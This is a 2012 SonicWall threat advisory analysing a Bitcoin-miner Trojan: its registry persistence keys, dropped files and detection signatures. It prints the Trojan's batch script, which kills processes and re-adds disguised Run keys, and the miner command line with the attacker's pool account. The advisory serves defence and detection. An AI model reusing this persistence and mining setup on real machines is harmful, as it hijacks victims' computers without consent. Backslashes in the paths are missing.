New Bitcoin miner Trojan spotted in the wild (May 18, 2012)

The Sonicwall UTM research team received reports of a new Bitcoin Miner Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. This kind of malware has been covered in a previous sonicalert but has recently become more and more prevalent as attackers recognise it as an easy and effective way to generate and transfer currency without being caught.

The Trojan [Detected as GAV: CoinMiner.I_3 (Trojan)] uses the following icon:

The Trojan makes the following DNS request:

The Trojan adds the following keys to the windows registry to enable startup after reboot:

• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun adobeupdate “”%AppData%8 8l3.lnk””
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun adobeupdater “”%AppData%8 8rundll32.exe””

The Trojan adds the following files to the filesystem:

• %AppData%8 8API.class
• %AppData%8 8API.java
• %AppData%8 8bat.bat
• %AppData%8 8bt.lnk [points to bat.bat]
• %AppData%8 8diablo120328.cl
• %AppData%8 8diakgcn120427.cl
• %AppData%8 8l3.lnk [points to svchost.exe]
• %AppData%8 8libcurl-4.dll
• %AppData%8 8libpdcurses.dll
• %AppData%8 8libusb-1.0.dll
• %AppData%8 8miner.php
• %AppData%8 8OpenCL.dll [for GPU features]
• %AppData%8 8phatk120223.cl
• %AppData%8 8poclbm120327.cl
• %AppData%8 8pthreadGC2.dll
• %AppData%8 8rundll32.exe [An application called StealthRunner]
• %AppData%8 8settings.txt [Used by rundll32.exe (StealthRunner)]
• %AppData%8 8svchost.exe [Detected as GAV: Ainslot.AA_12 (Trojan)]
• %AppData%8 8svchost2.exe [Detected as GAV: Ainslot.AA_12 (Trojan)]

rundll32.exe is an application called StealthRunner that is written by a user on the bitcointalk.org forum. It uses the following icon:

svchost.exe and svchost2.exe use the following icons:

bat.bat contains the following text:

@echo off
%windir%system32taskkill.exe /im svchost.exe
%windir%system32taskkill.exe /im rundll32.exe
%windir%system32taskkill.exe /im svchost2.exe
%windir%system32reg.exe add HKCUsoftwaremicrosoftwindowscurrentversionrun /v adobeupdate /d ""%appdata%3 4l3.lnk"" /f
%windir%system32reg.exe add HKCUsoftwaremicrosoftwindowscurrentversionrun /v adobeupdater /d ""%appdata%3 4rundll32.exe"" /f

settings.txt contains the bitcoin mining account data of the attacker:

svchost2.exe -o http://eu.triplemining.com:8344 -u klazim2000_3 -p 7747 [commandline for miner]
3
0

The Trojan was observed communicating with the mining server:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

• GAV: CoinMiner.I_3 (Trojan)
• GAV: Ainslot.AA_12 (Trojan)

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.